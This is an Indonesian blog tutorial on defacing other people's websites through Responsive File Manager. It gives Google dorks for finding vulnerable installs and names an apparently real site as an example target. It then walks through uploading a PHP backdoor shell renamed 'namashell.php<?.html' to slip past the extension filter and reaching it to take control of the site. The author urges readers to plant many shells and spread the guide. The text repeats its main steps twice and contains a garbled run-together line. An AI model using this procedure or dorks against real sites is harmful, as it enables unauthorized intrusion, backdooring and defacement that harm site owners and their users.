Siang ini admin Roni Gaes ingin memberitahukan untuk anda sobat yang sedang belajar deface website orang lain, dengan menggunakan teknik metode RFM ini anda jadikan cara tutorial untuk bisa melakukan deface website dengan mudah. Karena memang dari yang saya ketahui ini hanya melakukan Inject Filename saat anda mengupload shell backdoor yang di miliki.
Jika belum memiliki shell backdoor yang tepat dan mantap silahkan searching di google atau dari forum lalu pilih shell seperti apa yang dibutuhkan.
Baiklah langsung saja kita cari tau apa-apa saja bahan dan langkah-langkah untuk bisa belajar deface website bagi pemula dengan mudah. Kenapa mudah, pastinya karena sudah anda coba dan berhasil.
Belajar Deface Website POC Reponsive File Manager (RFM) Inject Filename
=====================================
DORK => inurl:/filemanager
Atau dikembangkan dork nya dengan menambahkan kode domain/negara
/filemanager site:.com
/filemanager site:.net
/filemanager site:.net
/filemanager site: "kode singakatan nama negara"
=====================================
EXPLOIT
=====================================
1. Searching dork di google "inurl:/filemanager" lalu pilih salah satu yang menjadi target
2. Contoh Target : https://www.gem.clinic/template/admin/filemanager/
3. Buka /filemanager/dialog.php.
4. Upload shell backdoor yang sudah kalian rename ( namashell.php<?.html )
5. Klik kanan mouse dari salah satu file dan pilih Show URL untuk melihat lokasi uploadnya.
6. Kebetulan target saya lokasi ke uploadnya di /assets/user-img/
7. Maka otomatis untuk Akses shellnya di "/assets/user/img/namashell.php"
8. Extensi file .php<?.html akan otomatis ke rename menjadi .php jadi kalian langsung buka namashell.php saja untuk mengakses shell.
Sampai di sini sobat sudah dapat mendeface sebuah website dengan mengakses shell yang sudah di tanamkan di celah tersebut. Lakukan seperti tahap awal apabila anda ingin mendapatkan banyak akses shell backdoor. Dan jangan lupa untuk saling berbagi tutorial deface website ini ke teman-teman anda.
Jika belum memiliki shell backdoor yang tepat dan mantap silahkan searching di google atau dari forum lalu pilih shell seperti apa yang dibutuhkan.
Baiklah langsung saja kita cari tau apa-apa saja bahan dan langkah-langkah untuk bisa belajar deface website bagi pemula dengan mudah. Kenapa mudah, pastinya karena sudah anda coba dan berhasil.
Belajar Deface Website POC Reponsive File Manager (RFM) Inject Filename
=====================================
DORK => inurl:/filemanager
Atau dikembangkan dork nya dengan menambahkan kode domain/negara
/filemanager site:.com
/filemanager site:.net
/filemanager site:.net
/filemanager site: "kode singakatan nama negara"
=====================================
EXPLOIT
/filemanager/dialog.phpKemudian ubah ekstensi shell dari namashell.php ke namashell.php<?.html
=====================================
 |
| RONI GAES |
Tutorial Deface Website
1. Searching dork di google "inurl:/filemanager" lalu pilih salah satu yang menjadi target
2. Contoh Target : https://www.gem.clinic/template/admin/filemanager/
3. Buka /filemanager/dialog.php.
4. Upload shell backdoor yang sudah kalian rename ( namashell.php<?.html )
5. Klik kanan mouse dari salah satu file dan pilih Show URL untuk melihat lokasi uploadnya.
6. Kebetulan target saya lokasi ke uploadnya di /assets/user-img/
7. Maka otomatis untuk Akses shellnya di "/assets/user/img/namashell.php"
8. Extensi file .php<?.html akan otomatis ke rename menjadi .php jadi kalian langsung buka namashell.php saja untuk mengakses shell.
Sampai di sini sobat sudah dapat mendeface sebuah website dengan mengakses shell yang sudah di tanamkan di celah tersebut. Lakukan seperti tahap awal apabila anda ingin mendapatkan banyak akses shell backdoor. Dan jangan lupa untuk saling berbagi tutorial deface website ini ke teman-teman anda.
Advertisement